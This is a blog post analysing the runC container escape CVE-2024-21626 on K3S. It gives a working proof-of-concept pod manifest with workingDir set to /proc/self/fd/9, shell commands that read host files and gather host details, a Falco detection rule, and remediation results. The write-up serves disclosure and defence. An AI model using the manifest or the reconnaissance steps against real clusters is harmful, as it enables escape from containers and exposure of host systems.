CloudNative.Quest

Quest to Cloud Native Computing

Discussion about the Leaky Vessels security vulnerability on K3S

Author:


Modified: Fri, 2024-Feb-09

Introduction

Leaky Vessels is a recently disclosed set of container security vulnerabilities that can lead to container escape. With such a vulnerability, processes running inside a container may gain access to files on the host system. Four related CVEs affect runC, Docker and BuildKit (CVE-2024-21626, CVE-2024-23651, CVE-2024-23652 and CVE-2024-23653). This article focuses on CVE-2024-21626, which affects the runC container runtime.

This vulnerability is caused by a file descriptor leak in the runC container runtime. Under specific conditions, attackers can leverage it to gain read access to the host file system or even overwrite files on it (I think this may depend on whether the container runs as root).
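To make the idea of a leaked descriptor more concrete, here is a minimal Python sketch that lists which open file descriptors of a process point to directories, by reading the symlinks under /proc/self/fd on Linux. The function name directory_fds is my own and is only for illustration; this is not how runC or any detector actually checks for the leak.

```python
import os

def directory_fds(fd_dir="/proc/self/fd"):
    """Return {fd_number: target} for entries in fd_dir that resolve to directories.

    On Linux, every entry in /proc/<pid>/fd is a symlink named after the
    descriptor number and pointing at the open file or directory.
    """
    found = {}
    for name in os.listdir(fd_dir):
        link = os.path.join(fd_dir, name)
        try:
            target = os.readlink(link)
        except OSError:
            continue  # descriptor was closed meanwhile, or entry is not a symlink
        # os.path.isdir follows the symlink, so this is true for directory fds
        if name.isdigit() and os.path.isdir(link):
            found[int(name)] = target
    return found

if __name__ == "__main__":
    for fd, target in sorted(directory_fds().items()):
        print(fd, target)
```

A descriptor that refers to a host directory and is still open when the container process starts is the kind of leak this CVE is about.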

When I heard about this vulnerability, most articles demonstrated how to exploit it on Docker systems (by creating and running a malicious container image). I tried another method to see whether the vulnerability can also be exploited on K3S. This is the first time I have seen a container escape vulnerability in real life.

Unpatched versions of K3S are affected

K3S uses containerd, which uses the runC runtime. Instead of creating a malicious container image, I set 'workingDir' in the pod definition to override the working directory. Below is an example:

---
apiVersion: v1
kind: Pod
metadata:
  name: leaky-vessels
spec:
  containers:
    - name: leaky-vessels
      image: docker.io/library/alpine:3.19
      workingDir: /proc/self/fd/9
      command: ["/bin/sh", "-c", "sleep infinity"]
      securityContext:
        allowPrivilegeEscalation: false
        capabilities:
          drop:
            - ALL
        privileged: false
        runAsNonRoot: true
        runAsUser: 1000000000
        runAsGroup: 1000000000
        seccompProfile:
          type: RuntimeDefault

Here, several security measures are enabled for the container. It is not allowed to run as root or to escalate privileges, it drops all Linux capabilities, and it uses the runtime's default seccomp profile. None of these measures prevents the Leaky Vessels attack on a vulnerable system.

Note that we did not create a malicious container image and trick the owner into running it. We just overrode the working directory of the container to '/proc/self/fd/9'. Depending on the runC version, the working directory reportedly needs to be set to '/proc/self/fd/n', where n is between 1 and 10.
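Since the trick only needs a working directory under /proc/.../fd/, pod definitions can be screened for it before they are applied. The following Python sketch works on an already parsed manifest (a plain dict, for example loaded with a YAML library of your choice). The function name suspicious_working_dirs and the regular expression are my own assumptions, not part of any Kubernetes tooling.

```python
import re

# Matches /proc/self/fd/<n>, /proc/thread-self/fd/<n> and /proc/<pid>/fd/<n>,
# optionally followed by a longer path.
_PROC_FD = re.compile(r"^/proc/(?:self|thread-self|\d+)/fd/\d+(?:/|$)")

def suspicious_working_dirs(pod):
    """Return [(container_name, workingDir)] for containers whose
    working directory points into a procfs file descriptor."""
    hits = []
    spec = pod.get("spec") or {}
    for key in ("initContainers", "containers", "ephemeralContainers"):
        for container in spec.get(key) or []:
            working_dir = container.get("workingDir") or ""
            if _PROC_FD.match(working_dir):
                hits.append((container.get("name", "?"), working_dir))
    return hits

if __name__ == "__main__":
    pod = {
        "kind": "Pod",
        "spec": {
            "containers": [
                {"name": "leaky-vessels", "workingDir": "/proc/self/fd/9"}
            ]
        },
    }
    print(suspicious_working_dirs(pod))
```

This only catches the pod-definition variant used in this article. A malicious image can set the same working directory in its own configuration, which this sketch does not inspect.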

Once the pod is running, we open a shell inside it:

        $ kubectl exec -it pod/leaky-vessels -- /bin/sh

 $ pwd

# This is container escaping
# We now have read access to the files on the host of the K3S system

 $ cd ../../../etc
 $ ls -l hostname
-rw-r--r--    1 root     root            17 Nov 11  2019 hostname

 $ cat hostname
k3s-controller.internal

Voila! There we have it. Once attackers have escaped the container, they can do a lot even without write access. An attacker could:

  • Read any file that is world-readable (readable by 'others'), including but not limited to:

    • Get the current hostname of the host server

    • Get the OS and Linux distribution of the host server (etc/redhat-release)

    • Get the DNS resolver of the host server

    • Access the RPM database of the host server (e.g. strings rpmdb.sqlite | grep src.rpm | sort)

      • The attackers would then know which packages are installed on the host

    • Access proc/net/route, from which the attackers would learn the default gateway of the host

    • Access proc/version, from which the attackers would learn the kernel version and architecture of the host

    • Access proc/PID/stat, from which the attackers would learn some of the PIDs and process names running on the host. For example:

      ls -1 */stat | xargs awk '{print $1 " " $2}' | sort -n -k 1
      # These are the PIDs and the process names
      33907 (nginx)
      33908 (nginx)
      33909 (nginx)
      33910 (nginx)
      33911 (nginx)

      Many of the process names of the host system are exposed.
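The awk one-liner above splits each stat line on whitespace, so a process name that contains spaces is cut off. As a small sketch of a more robust way to read the same two fields, the Python function below (parse_stat is a name I made up) takes the text between the first " (" and the last ")" as the process name.

```python
def parse_stat(line):
    """Return (pid, process_name) from one /proc/<pid>/stat line.

    The process name is wrapped in parentheses and may itself contain
    spaces or parentheses, so we split on the first " (" and the last ")".
    """
    pid_text, _, rest = line.partition(" (")
    name, _, _ = rest.rpartition(")")
    return int(pid_text), name

if __name__ == "__main__":
    print(parse_stat("33907 (nginx) S 1 33907 33907 0 -1"))
    print(parse_stat("4242 (tmux: server) S 1 4242 4242 0 -1"))
```

The sample lines are shortened and made up for illustration; real stat lines carry many more numeric fields after the process state.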

Below is a demonstration of the Leaky Vessels attack.

Detecting the Leaky Vessels vulnerability

Snyk has released static and dynamic (eBPF-based) detectors.

However, these detectors seem to be designed for Docker-based runC systems. They did not work on K3S in my testing.

We can use Falco to detect the vulnerability.

Here is the Falco rule (/etc/falco/rules.d/leaky-vessels.yaml) I used for this case:

---
- rule: Possible container escape attempt - Leaky Vessels
  desc: >
    Detects a container process that changes the current directory using a procfs file descriptor.
  condition: >
    ( container
    and evt.type = chdir
    and evt.dir = <
    and evt.rawres in (0, 1, 2)
    and evt.arg.path startswith "/proc/self/fd/" )
  output: >
    - Event time [%evt.datetime]
    - Possible container escape attempt detected.
    - Details
    evt.type=%evt.type
    evt.args=%evt.args
    evt.res=%evt.res
    proc.pid=%proc.pid proc.cwd=%proc.cwd
    proc.cmdline=%proc.cmdline proc.exepath=%proc.exepath
    proc.sid=%proc.sid
    proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline
    proc.vpid=%proc.vpid
    user.uid=%user.uid user.name=%user.name
    user.loginuid=%user.loginuid user.loginname=%user.loginname
    group.gid=%group.gid group.name=%group.name
    container.privileged=%container.privileged
    container.id=%container.id
    container.name=%container.name
    container.image=%container.image
    container.image.id=%container.image.id
    container_location=%container.image.repository:%container.image
    container.image.digest=%container.image.digest
    k8s.pod.name=%k8s.pod.name
  priority: WARNING
  tags: [host, container, cve-2024-21626]
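To reason about what the rule's condition accepts without a running Falco instance, it can be mirrored as a plain predicate. The Python sketch below is only that: the event is a hypothetical dict whose keys (in_container, type, dir, rawres, path) are names I chose to stand in for the Falco fields container, evt.type, evt.dir, evt.rawres and evt.arg.path. It is not Falco's API.

```python
def matches_leaky_vessels(event):
    """Mirror of the rule condition above on a hypothetical event dict."""
    return bool(
        event.get("in_container", False)          # container
        and event.get("type") == "chdir"          # evt.type = chdir
        and event.get("dir") == "<"               # exit event of the syscall
        and event.get("rawres") in (0, 1, 2)      # evt.rawres in (0, 1, 2)
        and str(event.get("path", "")).startswith("/proc/self/fd/")
    )

if __name__ == "__main__":
    sample = {
        "in_container": True,
        "type": "chdir",
        "dir": "<",
        "rawres": 0,
        "path": "/proc/self/fd/9",
    }
    print(matches_leaky_vessels(sample))
```

A chdir to an ordinary directory such as /app, or a chdir that fails with a negative return value, does not match.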

The log below is written to syslog as a single line. To make it easier to read, I split it into multiple lines.

Feb  7 09:22:09 k3s-controller falco[1157671]: 09:22:09.819887134:
Warning - Event time [2024-02-07 09:22:09.819887134]
- Possible container escape attempt detected.
- Details evt.type=chdir evt.args=res=0 path=/proc/self/fd/9
evt.res=SUCCESS proc.pid=1158172
proc.cwd=/proc/self/fd/9/ proc.cmdline=runc:[1:CHILD] init
proc.exepath=/data/container/rancher/k3s/data/3dfc950bd39d2e2b435291ab8c1333aa6051fcaf46325aee898819f3b99d4b21/bin/runc
proc.sid=99 proc.ppid=1158164
proc.pcmdline=runc --root /run/containerd/runc/k8s.io --log /run/k3s/containerd/io.containerd.runtime.v2.task/k8s.io/babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b/log.json --log-format json exec --process /tmp/runc-process1490844986 --console-socket /tmp/pty3871979753/pty.sock --detach --pid-file /run/k3s/containerd/io.containerd.runtime.v2.task/k8s.io/babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b/fcbbe128159780ff084f695701c87b38638eada0c896bfc75304a779df3ed5be.pid babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b
proc.vpid=99
user.uid=0 user.name=root user.loginuid=-1 user.loginname=<NA>
group.gid=0 group.name=root
container.privileged=<NA> container.id= container.name=<NA> container.image=<NA>
container.image.id=<NA> container_location=<NA>:<NA>
container.image.digest=<NA> k8s.pod.name=<NA>

Remediation and prevention

  • Check with vendors and upgrade vulnerable systems to a patched version (e.g., runc, Docker, BuildKit, containerd, K3S, OpenShift, cloud service providers, etc.)

  • According to articles I have read, Red Hat recommends configuring SELinux in enforcing mode so that these suspicious activities can be blocked

  • Container sandboxing with Google gVisor and Kata Containers: I tried the same method (setting 'workingDir') with an older version of Google gVisor and with Kata Containers on an unpatched K3S. The 'workingDir' method does not work under container sandboxing. These sandboxing techniques provide an isolated environment and reduce the attack surface.

    • Result with Google gVisor

      $ kubectl describe pod/leaky-vessels
      
      Name:         leaky-vessels
      Containers:
        leaky-vessels:
          Container ID:  containerd://d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a
          Image:         docker.io/library/alpine:3.19
          Command:
            /bin/sh
            -c
            sleep infinity
          State:          Waiting
            Reason:       CrashLoopBackOff
          Last State:     Terminated
            Reason:       StartError
            Message:      failed to start containerd task "d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a": OCI runtime start failed: starting container: starting sub-container [/bin/sh -c sleep infinity]: creating process: failed to find initial working directory "/proc/self/fd/9": invalid argument: unknown
            Exit Code:    128
          Ready:          False
    • Result with Kata Containers

      Name:         leaky-vessels
      Containers:
        leaky-vessels:
          Container ID:  containerd://b03df3a00fd9856d5f36bac3f346aba8451bd7814e8538d691da58d851c5b650
          Image:         docker.io/library/alpine:3.19
          Port:          <none>
          Host Port:     <none>
          Command:
            /bin/sh
            -c
            sleep infinity
          State:          Waiting
            Reason:       RunContainerError
          Last State:     Terminated
            Reason:       StartError
            Message:      failed to create containerd task: failed to create shim task: No such file or directory (os error 2): unknown
            Exit Code:    128
          Ready:          False
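For the first remediation item (upgrading), a quick way to tell whether a given runc binary still needs attention is to compare its reported version with 1.1.12, the runc release that fixes CVE-2024-21626. The Python sketch below parses the text printed by `runc --version`. The function names are my own, and for simplicity it treats every version below 1.1.12 as needing an upgrade.

```python
import re

PATCHED = (1, 1, 12)  # runc release that fixes CVE-2024-21626

def parse_runc_version(output):
    """Extract (major, minor, patch) from the output of `runc --version`."""
    match = re.search(r"runc version (\d+)\.(\d+)\.(\d+)", output)
    if not match:
        raise ValueError("no runc version found in output")
    return tuple(int(part) for part in match.groups())

def needs_upgrade(output):
    """True if the reported runc version is older than the patched release."""
    return parse_runc_version(output) < PATCHED

if __name__ == "__main__":
    print(needs_upgrade("runc version 1.1.10\nspec: 1.0.2-dev\n"))
    print(needs_upgrade("runc version 1.1.12\nspec: 1.0.2-dev\n"))
```

On K3S the runc binary is bundled with the distribution, so the check should be run against that bundled binary rather than a system-wide runc. Vendors may also backport the fix, so the vendor advisory remains the authoritative source.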
